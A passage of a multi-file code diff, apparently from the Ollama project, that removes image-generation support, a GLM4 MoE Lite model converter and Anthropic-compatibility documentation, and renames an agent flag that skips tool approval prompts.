- (void)systemWillPowerOff:(NSNotification *)notification {
-    // Set flag so applicationShouldTerminate: knows to allow termination.
-    // The system will call applicationShouldTerminate: after posting this notification.
-    self.systemShutdownInProgress = YES;
-}
-
 - (NSApplicationTerminateReply)applicationShouldTerminate:(NSApplication *)sender {
-    // Allow termination if the system is shutting down or restarting
-    if (self.systemShutdownInProgress) {
-        return NSTerminateNow;
-    }
-    // Otherwise just hide the app (for Cmd+Q, close button, etc.)
    [NSApp hide:nil];
    [NSApp setActivationPolicy:NSApplicationActivationPolicyAccessory];
    return NSTerminateCancel;
--- a/cmd/cmd.go
+++ b/cmd/cmd.go
@@ -46,9 +46,6 @@ import (
 	"github.com/ollama/ollama/types/syncmap"
 	"github.com/ollama/ollama/version"
 	xcmd "github.com/ollama/ollama/x/cmd"
-	"github.com/ollama/ollama/x/create"
-	xcreateclient "github.com/ollama/ollama/x/create/client"
-	"github.com/ollama/ollama/x/imagegen"
 )

 const ConnectInstructions = "To sign in, navigate to:\n    %s\n\n"
@@ -94,27 +91,11 @@ func CreateHandler(cmd *cobra.Command, args []string) error {
 	p := progress.NewProgress(os.Stderr)
 	defer p.Stop()

-	// Validate model name early to fail fast
-	modelName := args[0]
-	name := model.ParseName(modelName)
-	if !name.IsValid() {
-		return fmt.Errorf("invalid model name: %s", modelName)
-	}
-
 	var reader io.Reader

 	filename, err := getModelfileName(cmd)
 	if os.IsNotExist(err) {
 		if filename == "" {
-			// No Modelfile found - check if current directory is an image gen model
-			if create.IsTensorModelDir(".") {
-				quantize, _ := cmd.Flags().GetString("quantize")
-				return xcreateclient.CreateModel(xcreateclient.CreateOptions{
-					ModelName: modelName,
-					ModelDir:  ".",
-					Quantize:  quantize,
-				}, p)
-			}
 			reader = strings.NewReader("FROM .\n")
 		} else {
 			return errModelfileNotFound
@@ -136,28 +117,6 @@ func CreateHandler(cmd *cobra.Command, args []string) error {
 		return err
 	}

-	// Check if this is a tensor model (image generation) and handle it directly
-	quantize, _ := cmd.Flags().GetString("quantize")
-	modelDir := filepath.Dir(filename)
-	for _, cmd := range modelfile.Commands {
-		if cmd.Name == "model" {
-			if filepath.IsAbs(cmd.Args) {
-				modelDir = cmd.Args
-			} else {
-				modelDir = filepath.Join(filepath.Dir(filename), cmd.Args)
-			}
-			break
-		}
-	}
-	if create.IsTensorModelDir(modelDir) {
-		return xcreateclient.CreateModel(xcreateclient.CreateOptions{
-			ModelName: modelName,
-			ModelDir:  modelDir,
-			Quantize:  quantize,
-			Modelfile: xcreateclient.ExtractModelfileConfig(modelfile),
-		}, p)
-	}
-
 	status := "gathering model components"
 	spinner := progress.NewSpinner(status)
 	p.Add(status, spinner)
@@ -168,7 +127,8 @@ func CreateHandler(cmd *cobra.Command, args []string) error {
 	}
 	spinner.Stop()

-	req.Model = modelName
+	req.Model = args[0]
+	quantize, _ := cmd.Flags().GetString("quantize")
 	if quantize != "" {
 		req.Quantize = quantize
 	}
@@ -497,7 +457,6 @@ func RunHandler(cmd *cobra.Command, args []string) error {
 	}

 	name := args[0]
-
 	info, err := func() (*api.ShowResponse, error) {
 		showReq := &api.ShowRequest{Name: name}
 		info, err := client.Show(cmd.Context(), showReq)
@@ -559,18 +518,9 @@ func RunHandler(cmd *cobra.Command, args []string) error {
 		return generateEmbedding(cmd, name, opts.Prompt, opts.KeepAlive, truncate, dimensions)
 	}

-	// Check if this is an image generation model
-	if slices.Contains(info.Capabilities, model.CapabilityImage) {
-		if opts.Prompt == "" && !interactive {
-			return errors.New("image generation models require a prompt. Usage: ollama run " + name + " \"your prompt here\"")
-		}
-		return imagegen.RunCLI(cmd, name, opts.Prompt, interactive, opts.KeepAlive)
-	}
-
 	// Check for experimental flag
 	isExperimental, _ := cmd.Flags().GetBool("experimental")
-	yoloMode, _ := cmd.Flags().GetBool("experimental-yolo")
-	enableWebsearch, _ := cmd.Flags().GetBool("experimental-websearch")
+	yoloMode, _ := cmd.Flags().GetBool("yolo")

 	if interactive {
 		if err := loadOrUnloadModel(cmd, &opts); err != nil {
@@ -600,7 +550,7 @@ func RunHandler(cmd *cobra.Command, args []string) error {

 		// Use experimental agent loop with tools
 		if isExperimental {
-			return xcmd.GenerateInteractive(cmd, opts.Model, opts.WordWrap, opts.Options, opts.Think, opts.HideThinking, opts.KeepAlive, yoloMode, enableWebsearch)
+			return xcmd.GenerateInteractive(cmd, opts.Model, opts.WordWrap, opts.Options, opts.Think, opts.HideThinking, opts.KeepAlive, yoloMode)
 		}

 		return generateInteractive(cmd, opts)
@@ -706,11 +656,7 @@ func PushHandler(cmd *cobra.Command, args []string) error {

 			bar, ok := bars[resp.Digest]
 			if !ok {
-				msg := resp.Status
-				if msg == "" {
-					msg = fmt.Sprintf("pushing %s...", resp.Digest[7:19])
-				}
-				bar = progress.NewBar(msg, resp.Total, resp.Completed)
+				bar = progress.NewBar(fmt.Sprintf("pushing %s...", resp.Digest[7:19]), resp.Total, resp.Completed)
 				bars[resp.Digest] = bar
 				p.Add(resp.Digest, bar)
 			}
@@ -859,11 +805,11 @@ func DeleteHandler(cmd *cobra.Command, args []string) error {
 	for _, arg := range args {
 		// Unload the model if it's running before deletion
 		if err := loadOrUnloadModel(cmd, &runOptions{
-			Model:     arg,
+			Model:     args[0],
 			KeepAlive: &api.Duration{Duration: 0},
 		}); err != nil {
 			if !strings.Contains(strings.ToLower(err.Error()), "not found") {
-				fmt.Fprintf(os.Stderr, "Warning: unable to stop model '%s'\n", arg)
+				fmt.Fprintf(os.Stderr, "Warning: unable to stop model '%s'\n", args[0])
 			}
 		}

@@ -1819,11 +1765,7 @@ func NewCLI() *cobra.Command {
 	runCmd.Flags().Bool("truncate", false, "For embedding models: truncate inputs exceeding context length (default: true). Set --truncate=false to error instead")
 	runCmd.Flags().Int("dimensions", 0, "Truncate output embeddings to specified dimension (embedding models only)")
 	runCmd.Flags().Bool("experimental", false, "Enable experimental agent loop with tools")
-	runCmd.Flags().Bool("experimental-yolo", false, "Skip all tool approval prompts (use with caution)")
-	runCmd.Flags().Bool("experimental-websearch", false, "Enable web search tool in experimental mode")
-
-	// Image generation flags (width, height, steps, seed, etc.)
-	imagegen.RegisterFlags(runCmd)
+	runCmd.Flags().BoolP("yolo", "y", false, "Skip all tool approval prompts (use with caution)")

 	stopCmd := &cobra.Command{
 		Use:     "stop MODEL",
@@ -1938,7 +1880,6 @@ func NewCLI() *cobra.Command {
 	} {
 		switch cmd {
 		case runCmd:
-			imagegen.AppendFlagsDocs(cmd)
 			appendEnvDocs(cmd, []envconfig.EnvVar{envVars["OLLAMA_HOST"], envVars["OLLAMA_NOHISTORY"]})
 		case serveCmd:
 			appendEnvDocs(cmd, []envconfig.EnvVar{
--- a/cmd/cmd_test.go
+++ b/cmd/cmd_test.go
@@ -1547,79 +1547,6 @@ func TestRunOptions_Copy_ThinkValueVariants(t *testing.T) {
 	}
 }

-func TestShowInfoImageGen(t *testing.T) {
-	var b bytes.Buffer
-	err := showInfo(&api.ShowResponse{
-		Details: api.ModelDetails{
-			Family:            "ZImagePipeline",
-			ParameterSize:     "10.3B",
-			QuantizationLevel: "FP8",
-		},
-		Capabilities: []model.Capability{model.CapabilityImage},
-		Requires:     "0.14.0",
-	}, false, &b)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	expect := "  Model\n" +
-		"    architecture    ZImagePipeline    \n" +
-		"    parameters      10.3B             \n" +
-		"    quantization    FP8               \n" +
-		"    requires        0.14.0            \n" +
-		"\n" +
-		"  Capabilities\n" +
-		"    image    \n" +
-		"\n"
-	if diff := cmp.Diff(expect, b.String()); diff != "" {
-		t.Errorf("unexpected output (-want +got):\n%s", diff)
-	}
-}
-
-func TestPushProgressMessage(t *testing.T) {
-	tests := []struct {
-		name    string
-		status  string
-		digest  string
-		wantMsg string
-	}{
-		{
-			name:    "uses status when provided",
-			status:  "uploading model",
-			digest:  "sha256:abc123456789def",
-			wantMsg: "uploading model",
-		},
-		{
-			name:    "falls back to digest when status empty",
-			status:  "",
-			digest:  "sha256:abc123456789def",
-			wantMsg: "pushing abc123456789...",
-		},
-		{
-			name:    "handles short digest gracefully",
-			status:  "",
-			digest:  "sha256:abc",
-			wantMsg: "pushing sha256:abc...",
-		},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			msg := tt.status
-			if msg == "" {
-				if len(tt.digest) >= 19 {
-					msg = fmt.Sprintf("pushing %s...", tt.digest[7:19])
-				} else {
-					msg = fmt.Sprintf("pushing %s...", tt.digest)
-				}
-			}
-			if msg != tt.wantMsg {
-				t.Errorf("got %q, want %q", msg, tt.wantMsg)
-			}
-		})
-	}
-}
-
 func TestRunOptions_Copy_Independence(t *testing.T) {
 	// Test that modifications to original don't affect copy
 	originalThink := &api.ThinkValue{Value: "original"}
--- a/cmd/interactive.go
+++ b/cmd/interactive.go
@@ -116,7 +116,7 @@ func generateInteractive(cmd *cobra.Command, opts runOptions) error {
 		Prompt:         ">>> ",
 		AltPrompt:      "... ",
 		Placeholder:    "Send a message (/? for help)",
-		AltPlaceholder: "Press Enter to send",
+		AltPlaceholder: `Use """ to end multi-line input`,
 	})
 	if err != nil {
 		return err
--- a/convert/convert.go
+++ b/convert/convert.go
@@ -311,8 +311,6 @@ func LoadModelMetadata(fsys fs.FS) (ModelKV, *Tokenizer, error) {
 		conv = &deepseekocr{}
 	case "DeepseekV3ForCausalLM":
 		conv = &deepseek2Model{}
-	case "Glm4MoeLiteForCausalLM":
-		conv = &glm4MoeLiteModel{}
 	default:
 		return nil, nil, fmt.Errorf("unsupported architecture %q", p.Architectures[0])
 	}
--- a/convert/convert_glm4moelite.go
+++ b/convert/convert_glm4moelite.go
@@ -1,150 +0,0 @@
-package convert
-
-import (
-	"cmp"
-	"fmt"
-	"log/slog"
-	"regexp"
-	"strconv"
-
-	"github.com/ollama/ollama/fs/ggml"
-)
-
-type glm4MoeLiteModel struct {
-	ModelParameters
-	MaxPositionEmbeddings uint32  `json:"max_position_embeddings"`
-	HiddenSize            uint32  `json:"hidden_size"`
-	HiddenLayers          uint32  `json:"num_hidden_layers"`
-	IntermediateSize      uint32  `json:"intermediate_size"`
-	NumAttentionHeads     uint32  `json:"num_attention_heads"`
-	NumKeyValueHeads      uint32  `json:"num_key_value_heads"`
-	RMSNormEPS            float32 `json:"rms_norm_eps"`
-
-	RopeTheta     float32 `json:"rope_theta"`
-	QKNopeHeadDim uint32  `json:"qk_nope_head_dim"`
-	QKRopeHeadDim uint32  `json:"qk_rope_head_dim"`
-	KVLoraRank    uint32  `json:"kv_lora_rank"`
-	QLoraRank     uint32  `json:"q_lora_rank"`
-	VHeadDim      uint32  `json:"v_head_dim"`
-
-	ExpertCount            uint32  `json:"n_routed_experts"`
-	ExpertSharedCount      uint32  `json:"n_shared_experts"`
-	ExpertIntermediateSize uint32  `json:"moe_intermediate_size"`
-	ExpertUsedCount        uint32  `json:"num_experts_per_tok"`
-	ExpertWeightsNorm      bool    `json:"norm_topk_prob"`
-	ExpertWeightsScale     float32 `json:"routed_scaling_factor"`
-
-	LeadingDenseBlockCount uint32 `json:"first_k_dense_replace"`
-}
-
-func (p *glm4MoeLiteModel) KV(t *Tokenizer) KV {
-	kv := p.ModelParameters.KV(t)
-	kv["general.architecture"] = "glm4moelite"
-	kv["general.type"] = "model"
-	kv["glm4moelite.block_count"] = p.HiddenLayers
-
-	numHeads := p.NumAttentionHeads
-	numKVHeads := p.NumKeyValueHeads
-
-	kv["glm4moelite.attention.head_count"] = numHeads
-	kv["glm4moelite.attention.head_count_kv"] = numKVHeads
-	kv["glm4moelite.attention.key_length"] = p.QKNopeHeadDim + p.QKRopeHeadDim
-	kv["glm4moelite.attention.kv_lora_rank"] = p.KVLoraRank
-	kv["glm4moelite.attention.layer_norm_rms_epsilon"] = p.RMSNormEPS
-	kv["glm4moelite.attention.q_lora_rank"] = p.QLoraRank
-	kv["glm4moelite.attention.value_length"] = p.VHeadDim
-	kv["glm4moelite.context_length"] = p.MaxPositionEmbeddings
-	kv["glm4moelite.embedding_length"] = p.HiddenSize
-	kv["glm4moelite.expert_count"] = p.ExpertCount
-	kv["glm4moelite.expert_feed_forward_length"] = p.ExpertIntermediateSize
-	kv["glm4moelite.expert_shared_count"] = p.ExpertSharedCount
-
-	kv["glm4moelite.expert_gating_func"] = uint32(2)
-	kv["glm4moelite.expert_used_count"] = p.ExpertUsedCount
-	kv["glm4moelite.expert_weights_norm"] = p.ExpertWeightsNorm
-	kv["glm4moelite.expert_weights_scale"] = p.ExpertWeightsScale
-	kv["glm4moelite.feed_forward_length"] = p.IntermediateSize
-	kv["glm4moelite.leading_dense_block_count"] = p.LeadingDenseBlockCount
-
-	kv["glm4moelite.rope.dimension_count"] = p.QKRopeHeadDim
-	kv["glm4moelite.rope.freq_base"] = cmp.Or(p.RopeTheta, float32(1000000.0))
-
-	kv["tokenizer.ggml.pre"] = "glm4"
-
-	return kv
-}
-
-func (p *glm4MoeLiteModel) Replacements() []string {
-	return []string{
-		"lm_head", "output",
-		"model.embed_tokens", "token_embd",
-		"model.norm", "output_norm",
-		"model.layers", "blk",
-		"input_layernorm", "attn_norm",
-		"self_attn.kv_a_proj_with_mqa", "attn_kv_a_mqa",
-		"self_attn.kv_a_layernorm", "attn_kv_a_norm",
-		"self_attn.kv_b_proj", "attn_kv_b",
-		"self_attn.q_a_proj", "attn_q_a",
-		"self_attn.q_a_layernorm", "attn_q_a_norm",
-		"self_attn.q_b_proj", "attn_q_b",
-		"self_attn.o_proj", "attn_output",
-		"post_attention_layernorm", "ffn_norm",
-		"mlp.shared_experts.down_proj", "ffn_down_shexp",
-		"mlp.shared_experts.gate_proj", "ffn_gate_shexp",
-		"mlp.shared_experts.up_proj", "ffn_up_shexp",
-		"mlp.gate_proj", "ffn_gate",
-		"mlp.down_proj", "ffn_down",
-		"mlp.up_proj", "ffn_up",
-		"mlp.gate.e_score_correction_bias", "exp_probs_b.bias",
-		"mlp.gate", "ffn_gate_inp",
-	}
-}
-
-func (p *glm4MoeLiteModel) Tensors(s []Tensor) (out []*ggml.Tensor) {
-	merges := make([]merge, p.HiddenLayers*3)
-	for i := range p.HiddenLayers {
-		merges[i*3+0] = merge{
-			fmt.Sprintf("blk.%d.mlp.experts.*.gate_proj.weight", i),
-			fmt.Sprintf("blk.%d.ffn_gate_exps.weight", i),
-		}
-		merges[i*3+1] = merge{
-			fmt.Sprintf("blk.%d.mlp.experts.*.up_proj.weight", i),
-			fmt.Sprintf("blk.%d.ffn_up_exps.weight", i),
-		}
-		merges[i*3+2] = merge{
-			fmt.Sprintf("blk.%d.mlp.experts.*.down_proj.weight", i),
-			fmt.Sprintf("blk.%d.ffn_down_exps.weight", i),
-		}
-	}
-
-	skipLayer := func(n string, minValue uint32) bool {
-		re := regexp.MustCompile(`^blk\.(\d+)`)
-		matches := re.FindStringSubmatch(n)
-		if matches == nil {
-			return false
-		}
-
-		blkNum, err := strconv.Atoi(matches[1])
-		if err != nil {
-			return false
-		}
-
-		return uint32(blkNum) >= minValue
-	}
-
-	out, s = mergeTensors(s, merges...)
-	for _, t := range s {
-		// skip any additional layers (such as the Multi-Token Prediction layer)
-		if skipLayer(t.Name(), p.HiddenLayers) {
-			slog.Debug("skipping layer", "name", t.Name())
-			continue
-		}
-		out = append(out, &ggml.Tensor{
-			Name:     t.Name(),
-			Kind:     t.Kind(),
-			Shape:    t.Shape(),
-			WriterTo: t,
-		})
-	}
-	return out
-}
--- a/docs/README.md
+++ b/docs/README.md
@@ -14,7 +14,6 @@
 * [API Reference](https://docs.ollama.com/api)
 * [Modelfile Reference](https://docs.ollama.com/modelfile)
 * [OpenAI Compatibility](https://docs.ollama.com/api/openai-compatibility)
-* [Anthropic Compatibility](./api/anthropic-compatibility.mdx)

 ### Resources

--- a/docs/api.md
+++ b/docs/api.md
@@ -16,7 +16,6 @@
 - [Generate Embeddings](#generate-embeddings)
 - [List Running Models](#list-running-models)
 - [Version](#version)
- [Experimental: Image Generation](#image-generation-experimental)

 ## Conventions

@@ -59,15 +58,6 @@ Advanced parameters (optional):
 - `keep_alive`: controls how long the model will stay loaded into memory following the request (default: `5m`)
 - `context` (deprecated): the context parameter returned from a previous request to `/generate`, this can be used to keep a short conversational memory

-Experimental image generation parameters (for image generation models only):
-
-> [!WARNING]
-> These parameters are experimental and may change in future versions.
-
- `width`: width of the generated image in pixels
- `height`: height of the generated image in pixels
- `steps`: number of diffusion steps
-
 #### Structured outputs

 Structured outputs are supported by providing a JSON schema in the `format` parameter. The model will generate a response that matches the schema. See the [structured outputs](#request-structured-outputs) example below.
@@ -1877,55 +1867,3 @@ curl http://localhost:11434/api/version
  "version": "0.5.1"
 }
 ```
-
-## Experimental Features
-
-### Image Generation (Experimental)
-
-> [!WARNING]
-> Image generation is experimental and may change in future versions.
-
-Image generation is now supported through the standard `/api/generate` endpoint when using image generation models. The API automatically detects when an image generation model is being used.
-
-See the [Generate a completion](#generate-a-completion) section for the full API documentation. The experimental image generation parameters (`width`, `height`, `steps`) are documented there.
-
-#### Example
-
-##### Request
-
-```shell
-curl http://localhost:11434/api/generate -d '{
-  "model": "x/z-image-turbo",
-  "prompt": "a sunset over mountains",
-  "width": 1024,
-  "height": 768
-}'
-```
-
-##### Response (streaming)
-
-Progress updates during generation:
-
-```json
-{
-  "model": "x/z-image-turbo",
-  "created_at": "2024-01-15T10:30:00.000000Z",
-  "completed": 5,
-  "total": 20,
-  "done": false
-}
-```
-
-##### Final Response
-
-```json
-{
-  "model": "x/z-image-turbo",
-  "created_at": "2024-01-15T10:30:15.000000Z",
-  "image": "iVBORw0KGgoAAAANSUhEUg...",
-  "done": true,
-  "done_reason": "stop",
-  "total_duration": 15000000000,
-  "load_duration": 2000000000
-}
-```
--- a/docs/api/anthropic-compatibility.mdx
+++ b/docs/api/anthropic-compatibility.mdx
@@ -1,408 +0,0 @@
---
-title: Anthropic compatibility
---
-
-Ollama provides compatibility with the [Anthropic Messages API](https://docs.anthropic.com/en/api/messages) to help connect existing applications to Ollama, including tools like Claude Code.
-
-## Recommended models
-
-For coding use cases, models like `glm-4.7:cloud`, `minimax-m2.1:cloud`, and `qwen3-coder` are recommended.
-
-Pull a model before use:
-```shell
-ollama pull qwen3-coder
-ollama pull glm-4.7:cloud
-```
-
-## Usage
-
-### Environment variables
-
-To use Ollama with tools that expect the Anthropic API (like Claude Code), set these environment variables:
-
-```shell
-export ANTHROPIC_AUTH_TOKEN=ollama  # required but ignored
-export ANTHROPIC_BASE_URL=http://localhost:11434
-export ANTHROPIC_API_KEY=ollama  # required but ignored
-```
-
-### Simple `/v1/messages` example
-
-<CodeGroup dropdown>
-
-```python basic.py
-import anthropic
-
-client = anthropic.Anthropic(
-    base_url='http://localhost:11434',
-    api_key='ollama',  # required but ignored
-)
-
-message = client.messages.create(
-    model='qwen3-coder',
-    max_tokens=1024,
-    messages=[
-        {'role': 'user', 'content': 'Hello, how are you?'}
-    ]
-)
-print(message.content[0].text)
-```
-
-```javascript basic.js
-import Anthropic from "@anthropic-ai/sdk";
-
-const anthropic = new Anthropic({
-  baseURL: "http://localhost:11434",
-  apiKey: "ollama", // required but ignored
-});
-
-const message = await anthropic.messages.create({
-  model: "qwen3-coder",
-  max_tokens: 1024,
-  messages: [{ role: "user", content: "Hello, how are you?" }],
-});
-
-console.log(message.content[0].text);
-```
-
-```shell basic.sh
-curl -X POST http://localhost:11434/v1/messages \
-H "Content-Type: application/json" \
-H "x-api-key: ollama" \
-H "anthropic-version: 2023-06-01" \
-d '{
-  "model": "qwen3-coder",
-  "max_tokens": 1024,
-  "messages": [{ "role": "user", "content": "Hello, how are you?" }]
-}'
-```
-
-</CodeGroup>
-
-### Streaming example
-
-<CodeGroup dropdown>
-
-```python streaming.py
-import anthropic
-
-client = anthropic.Anthropic(
-    base_url='http://localhost:11434',
-    api_key='ollama',
-)
-
-with client.messages.stream(
-    model='qwen3-coder',
-    max_tokens=1024,
-    messages=[{'role': 'user', 'content': 'Count from 1 to 10'}]
-) as stream:
-    for text in stream.text_stream:
-        print(text, end='', flush=True)
-```
-
-```javascript streaming.js
-import Anthropic from "@anthropic-ai/sdk";
-
-const anthropic = new Anthropic({
-  baseURL: "http://localhost:11434",
-  apiKey: "ollama",
-});
-
-const stream = await anthropic.messages.stream({
-  model: "qwen3-coder",
-  max_tokens: 1024,
-  messages: [{ role: "user", content: "Count from 1 to 10" }],
-});
-
-for await (const event of stream) {
-  if (
-    event.type === "content_block_delta" &&
-    event.delta.type === "text_delta"
-  ) {
-    process.stdout.write(event.delta.text);
-  }
-}
-```
-
-```shell streaming.sh
-curl -X POST http://localhost:11434/v1/messages \
-H "Content-Type: application/json" \
-d '{
-  "model": "qwen3-coder",
-  "max_tokens": 1024,
-  "stream": true,
-  "messages": [{ "role": "user", "content": "Count from 1 to 10" }]
-}'
-```
-
-</CodeGroup>
-
-### Tool calling example
-
-<CodeGroup dropdown>
-
-```python tools.py
-import anthropic
-
-client = anthropic.Anthropic(
-    base_url='http://localhost:11434',
-    api_key='ollama',
-)
-
-message = client.messages.create(
-    model='qwen3-coder',
-    max_tokens=1024,
-    tools=[
-        {
-            'name': 'get_weather',
-            'description': 'Get the current weather in a location',
-            'input_schema': {
-                'type': 'object',
-                'properties': {
-                    'location': {
-                        'type': 'string',
-                        'description': 'The city and state, e.g. San Francisco, CA'
-                    }
-                },
-                'required': ['location']
-            }
-        }
-    ],
-    messages=[{'role': 'user', 'content': "What's the weather in San Francisco?"}]
-)
-
-for block in message.content:
-    if block.type == 'tool_use':
-        print(f'Tool: {block.name}')
-        print(f'Input: {block.input}')
-```
-
-```javascript tools.js
-import Anthropic from "@anthropic-ai/sdk";
-
-const anthropic = new Anthropic({
-  baseURL: "http://localhost:11434",
-  apiKey: "ollama",
-});
-
-const message = await anthropic.messages.create({
-  model: "qwen3-coder",
-  max_tokens: 1024,
-  tools: [
-    {
-      name: "get_weather",
-      description: "Get the current weather in a location",
-      input_schema: {
-        type: "object",
-        properties: {
-          location: {
-            type: "string",
-            description: "The city and state, e.g. San Francisco, CA",
-          },
-        },
-        required: ["location"],
-      },
-    },
-  ],
-  messages: [{ role: "user", content: "What's the weather in San Francisco?" }],
-});
-
-for (const block of message.content) {
-  if (block.type === "tool_use") {
-    console.log("Tool:", block.name);
-    console.log("Input:", block.input);
-  }
-}
-```
-
-```shell tools.sh
-curl -X POST http://localhost:11434/v1/messages \
-H "Content-Type: application/json" \
-d '{
-  "model": "qwen3-coder",
-  "max_tokens": 1024,
-  "tools": [
-    {
-      "name": "get_weather",
-      "description": "Get the current weather in a location",
-      "input_schema": {
-        "type": "object",
-        "properties": {
-          "location": {
-            "type": "string",
-            "description": "The city and state"
-          }
-        },
-        "required": ["location"]
-      }
-    }
-  ],
-  "messages": [{ "role": "user", "content": "What is the weather in San Francisco?" }]
-}'
-```
-
-</CodeGroup>
-
-## Using with Claude Code
-
-[Claude Code](https://code.claude.com/docs/en/overview) can be configured to use Ollama as its backend:
-
-```shell
-ANTHROPIC_AUTH_TOKEN=ollama ANTHROPIC_BASE_URL=http://localhost:11434 ANTHROPIC_API_KEY=ollama claude --model qwen3-coder
-```
-
-Or set the environment variables in your shell profile:
-
-```shell
-export ANTHROPIC_AUTH_TOKEN=ollama
-export ANTHROPIC_BASE_URL=http://localhost:11434
-export ANTHROPIC_API_KEY=ollama
-```
-
-Then run Claude Code with any Ollama model:
-
-```shell
-# Local models
-claude --model qwen3-coder
-claude --model gpt-oss:20b
-
-# Cloud models
-claude --model glm-4.7:cloud
-claude --model minimax-m2.1:cloud
-```
-
-## Endpoints
-
-### `/v1/messages`
-
-#### Supported features
-
- [x] Messages
- [x] Streaming
- [x] System prompts
- [x] Multi-turn conversations
- [x] Vision (images)
- [x] Tools (function calling)
- [x] Tool results
- [x] Thinking/extended thinking
-
-#### Supported request fields
-
- [x] `model`
- [x] `max_tokens`
- [x] `messages`
-  - [x] Text `content`
-  - [x] Image `content` (base64)
-  - [x] Array of content blocks
-  - [x] `tool_use` blocks
-  - [x] `tool_result` blocks
-  - [x] `thinking` blocks
- [x] `system` (string or array)
- [x] `stream`
- [x] `temperature`
- [x] `top_p`
- [x] `top_k`
- [x] `stop_sequences`
- [x] `tools`
- [x] `thinking`
- [ ] `tool_choice`
- [ ] `metadata`
-
-#### Supported response fields
-
- [x] `id`
- [x] `type`
- [x] `role`
- [x] `model`
- [x] `content` (text, tool_use, thinking blocks)
- [x] `stop_reason` (end_turn, max_tokens, tool_use)
- [x] `usage` (input_tokens, output_tokens)
-
-#### Streaming events
-
- [x] `message_start`
- [x] `content_block_start`
- [x] `content_block_delta` (text_delta, input_json_delta, thinking_delta)
- [x] `content_block_stop`
- [x] `message_delta`
- [x] `message_stop`
- [x] `ping`
- [x] `error`
-
-## Models
-
-Ollama supports both local and cloud models.
-
-### Local models
-
-Pull a local model before use:
-
-```shell
-ollama pull qwen3-coder
-```
-
-Recommended local models:
- `qwen3-coder` - Excellent for coding tasks
- `gpt-oss:20b` - Strong general-purpose model
-
-### Cloud models
-
-Cloud models are available immediately without pulling:
-
- `glm-4.7:cloud` - High-performance cloud model
- `minimax-m2.1:cloud` - Fast cloud model
-
-### Default model names
-
-For tooling that relies on default Anthropic model names such as `claude-3-5-sonnet`, use `ollama cp` to copy an existing model name:
-
-```shell
-ollama cp qwen3-coder claude-3-5-sonnet
-```
-
-Afterwards, this new model name can be specified in the `model` field:
-
-```shell
-curl http://localhost:11434/v1/messages \
-    -H "Content-Type: application/json" \
-    -d '{
-        "model": "claude-3-5-sonnet",
-        "max_tokens": 1024,
-        "messages": [
-            {
-                "role": "user",
-                "content": "Hello!"
-            }
-        ]
-    }'
-```
-
-## Differences from the Anthropic API
-
-### Behavior differences
-
- API key is accepted but not validated
- `anthropic-version` header is accepted but not used
- Token counts are approximations based on the underlying model's tokenizer
-
-### Not supported
-
-The following Anthropic API features are not currently supported:
-
-| Feature | Description |
-|---------|-------------|
-| `/v1/messages/count_tokens` | Token counting endpoint |
-| `tool_choice` | Forcing specific tool use or disabling tools |
-| `metadata` | Request metadata (user_id) |
-| Prompt caching | `cache_control` blocks for caching prefixes |
-| Batches API | `/v1/messages/batches` for async batch processing |
-| Citations | `citations` content blocks |
-| PDF support | `document` content blocks with PDF files |
-| Server-sent errors | `error` events during streaming (errors return HTTP status) |
-
-### Partial support
-
-| Feature | Status |
-|---------|--------|
-| Image content | Base64 images supported; URL images not supported |
-| Extended thinking | Basic support; `budget_tokens` accepted but not enforced |
--- a/docs/api/openai-compatibility.mdx
+++ b/docs/api/openai-compatibility.mdx
@@ -275,73 +275,6 @@ curl -X POST http://localhost:11434/v1/chat/completions \
 - [x] `dimensions`
 - [ ] `user`

-### `/v1/images/generations` (experimental)
-
-> Note: This endpoint is experimental and may change or be removed in future versions.
-
-Generate images using image generation models.
-
-<CodeGroup dropdown>
-
-```python images.py
-from openai import OpenAI
-
-client = OpenAI(
-    base_url='http://localhost:11434/v1/',
-    api_key='ollama',  # required but ignored
-)
-
-response = client.images.generate(
-    model='x/z-image-turbo',
-    prompt='A cute robot learning to paint',
-    size='1024x1024',
-    response_format='b64_json',
-)
-print(response.data[0].b64_json[:50] + '...')
-```
-
-```javascript images.js
-import OpenAI from "openai";
-
-const openai = new OpenAI({
-  baseURL: "http://localhost:11434/v1/",
-  apiKey: "ollama", // required but ignored
-});
-
-const response = await openai.images.generate({
-  model: "x/z-image-turbo",
-  prompt: "A cute robot learning to paint",
-  size: "1024x1024",
-  response_format: "b64_json",
-});
-
-console.log(response.data[0].b64_json.slice(0, 50) + "...");
-```
-
-```shell images.sh
-curl -X POST http://localhost:11434/v1/images/generations \
-H "Content-Type: application/json" \
-d '{
-  "model": "x/z-image-turbo",
-  "prompt": "A cute robot learning to paint",
-  "size": "1024x1024",
-  "response_format": "b64_json"
-}'
-```
-
-</CodeGroup>
-
-#### Supported request fields
-
- [x] `model`
- [x] `prompt`
- [x] `size` (e.g. "1024x1024")
- [x] `response_format` (only `b64_json` supported)
- [ ] `n`
- [ ] `quality`
- [ ] `style`
- [ ] `user`
-
 ### `/v1/responses`

 > Note: Added in Ollama v0.13.3
--- a/docs/capabilities/web-search.mdx
+++ b/docs/capabilities/web-search.mdx
@@ -110,7 +110,7 @@ More Ollama [Python example](https://github.com/ollama/ollama-python/blob/main/e
 import { Ollama } from "ollama";

 const client = new Ollama();
-const results = await client.webSearch("what is ollama?");
+const results = await client.webSearch({ query: "what is ollama?" });
 console.log(JSON.stringify(results, null, 2));
 ```

@@ -213,7 +213,7 @@ models](https://ollama.com/models)\n\nAvailable for macOS, Windows, and Linux',
 import { Ollama } from "ollama";

 const client = new Ollama();
-const fetchResult = await client.webFetch("https://ollama.com");
+const fetchResult = await client.webFetch({ url: "https://ollama.com" });
 console.log(JSON.stringify(fetchResult, null, 2));
 ```

--- a/docs/docs.json
+++ b/docs/docs.json
@@ -32,9 +32,7 @@
    "codeblocks": "system"
  },
  "contextual": {
-    "options": [
-      "copy"
-    ]
+    "options": ["copy"]
  },
  "navbar": {
    "links": [
@@ -54,9 +52,7 @@
      "display": "simple"
    },
    "examples": {
-      "languages": [
-        "curl"
-      ]
+      "languages": ["curl"]
    }
  },
  "redirects": [
@@ -101,7 +97,6 @@
          {
            "group": "Integrations",
            "pages": [
-              "/integrations/claude-code",
              "/integrations/vscode",
              "/integrations/jetbrains",
              "/integrations/codex",
@@ -111,9 +106,7 @@
              "/integrations/zed",
              "/integrations/roo-code",
              "/integrations/n8n",
-              "/integrations/xcode",
-              "/integrations/onyx",
-              "/integrations/marimo"
+              "/integrations/xcode"
            ]
          },
          {
@@ -146,8 +139,7 @@
              "/api/streaming",
              "/api/usage",
              "/api/errors",
-              "/api/openai-compatibility",
